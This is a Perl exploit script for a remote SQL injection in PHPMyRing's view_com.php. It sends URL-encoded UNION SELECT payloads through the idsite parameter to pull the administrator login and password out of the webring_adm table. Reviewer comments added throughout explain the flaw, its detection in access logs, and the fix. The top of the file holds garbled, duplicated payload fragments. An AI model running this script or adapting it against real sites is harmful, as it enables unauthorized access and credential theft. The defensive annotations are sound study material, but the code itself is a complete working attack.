#######################################################################
---------[/code]
#===========
#===========
#===========
#===========
adm%20FROM%20webring_adm
dm%20FROM%20webring_adm
o%20FROM%20webring%20WHERE%20idsite=[victimesiteid]
0FROM%20webring%20WHERE%20idsite=[victimesiteid]
use IO::Socket;
# Usage guard: when the argument check fails, print the banner and the usage
# text, then exit without opening any network connection.
# NOTE(review): defined() is applied to the result of `$ARGV[0] && $ARGV[1]`,
# not to each argument on its own, so this is not a strict "both arguments
# were supplied" test.
if(!defined($ARGV[0] && $ARGV[1])) {
# `clear` is a bareword, so this line only compiles because the script does
# not enable `use strict`; it invokes the external command named "clear".
system (clear);
print "\n";
print "#################################################\n";
print "# PHPMyRing's Remote SQL injection Exploit #\n";
print "# Discovered by simo64_at_morx_org #\n";
print "# Script writting by simo_at_morx_org #\n";
print "# MorX Security Research Team #\n";
print "# www.morx.org #\n";
print "#################################################\n\n";
# $0 interpolates the script's own name into the usage lines.
print "— Usage: perl $0 <host> <folder>\n";
print "— Example: perl $0 127.0.0.1 afd_webring\n\n";
exit; }
# Request parameters. Host and folder are taken from the command line as-is
# (no validation); the port is fixed at 80. All of these are package globals
# because the script declares nothing with `my`.
$TARGET = $ARGV[0];
$FOLDER = $ARGV[1];
$PORT = "80";
# Endpoint exercised by the script: the idsite query parameter of view_com.php.
$SCRIPT = "/view_com.php?idsite=";
# URL-encoded values placed in idsite. Decoded they read
# "-1 UNION SELECT passadm FROM webring_adm" and
# "-1 UNION SELECT loginadm FROM webring_adm".
# Defender note: these values can only have an effect if view_com.php puts
# idsite into its SQL text without forcing it to an integer or binding it as a
# parameter (presumably the case; the PHP source is not shown here). Treating
# idsite strictly as an integer, or using a prepared statement, removes the
# injection point.
# Detection: access-log entries for view_com.php whose idsite value contains
# "UNION", "SELECT" or the table name "webring_adm" (often with %20 for the
# spaces) match the requests built below.
$SQLPASS = "-1%20UNION%20SELECT%20passadm%20FROM%20webring_adm";
$SQLADMIN = "-1%20UNION%20SELECT%20loginadm%20FROM%20webring_adm";
########################################################################
########
# Pieces of the two HTTP requests: COMMAND1 and COMMAND4 are the request lines
# (login column and password column respectively); COMMAND2 and COMMAND3 are
# the Host and Connection headers shared by both requests.
$COMMAND1 = "GET /$FOLDER$SCRIPT$SQLADMIN HTTP/1.1";
$COMMAND2 = "Host: $TARGET";
$COMMAND3 = "Connection: Close";
$COMMAND4 = "GET /$FOLDER$SCRIPT$SQLPASS HTTP/1.1";
# First request: open a TCP connection to the host and port set above and die
# if the socket cannot be created.
$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET",PeerPort=>"$PORT"
)
|| die "Can't connect to $TARGET";
print "#################################################\n";
print "# PHPMyRing's Remote SQL injection Exploit #\n";
print "# Discovered by simo64_at_morx_org #\n";
print "# Script writting by simo_at_morx_org #\n";
print "# MorX Security Research Team #\n";
print "# www.morx.org #\n";
print "#################################################\n\n";
# Two-second pause after the banner; nothing else happens during it.
sleep 2;
print "[*] Trying to get the admin login …\n\n";
# Send the request line for the loginadm query followed by the Host and
# Connection headers and a blank line.
print $remote "$COMMAND1\n$COMMAND2\n$COMMAND3\n\n";
# Read the response line by line. Any line containing "site " followed later
# by "<" is treated as a hit: the text in between is captured and printed.
# Every matching line prints, and $adminlogin keeps the last one.
# Defender note: a hit means the page echoes a query result back into its
# HTML after the word "site " (inferred from this pattern; the page template
# is not shown here).
while ($result = <$remote> ) {
if ($result =~ /site (.*?)</ ) {
$adminlogin = $1;
print "[+] your admin login is –> $adminlogin\n\n";
$a = 1;
}
}
# $a is never initialised before the loop, so when no line matched it is still
# undef, which compares equal to 0 numerically and selects the failure branch.
if ($a == 0)
{
print "[-] Failed, cant get the admin login\n\n";
# NOTE(review): this progress message sits inside the failure branch, so it is
# printed only when the login lookup above found nothing.
print "[*] Trying to get the admin password …\n\n";
}
# Second request: open a new TCP connection for the passadm query. The handle
# previously held in $remote is replaced here without an explicit close.
$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET",PeerPort=>"$PORT"
)
|| die "Can't connect to $TARGET";
# Send the request line for the passadm query with the same Host and
# Connection headers as the first request.
print $remote "$COMMAND4\n$COMMAND2\n$COMMAND3\n\n";
# Same response scan as for the login: capture the text between "site " and
# the next "<" on each line, print every hit, keep the last one in $adminpass.
# Defender note: whether the returned value is a plaintext password or a hash
# depends on how the application stores passadm, which is not visible here.
# If requests of this shape appear in the access log, treat the administrator
# credentials as disclosed and rotate them.
while ($result2 = <$remote> ) {
if ($result2 =~ /site (.*?)</ ) {
$adminpass = $1;
print "[+] your admin pass is –> $adminpass\n\n";
$b = 1;
}
}
# As with $a, $b is never initialised, so undef == 0 selects this branch when
# no response line matched.
if ($b == 0)
{ print "[-] Failed, cant get the admin password\n";
}
# Flush and close the second socket, then end the script.
$remote->flush();
close($remote);
exit;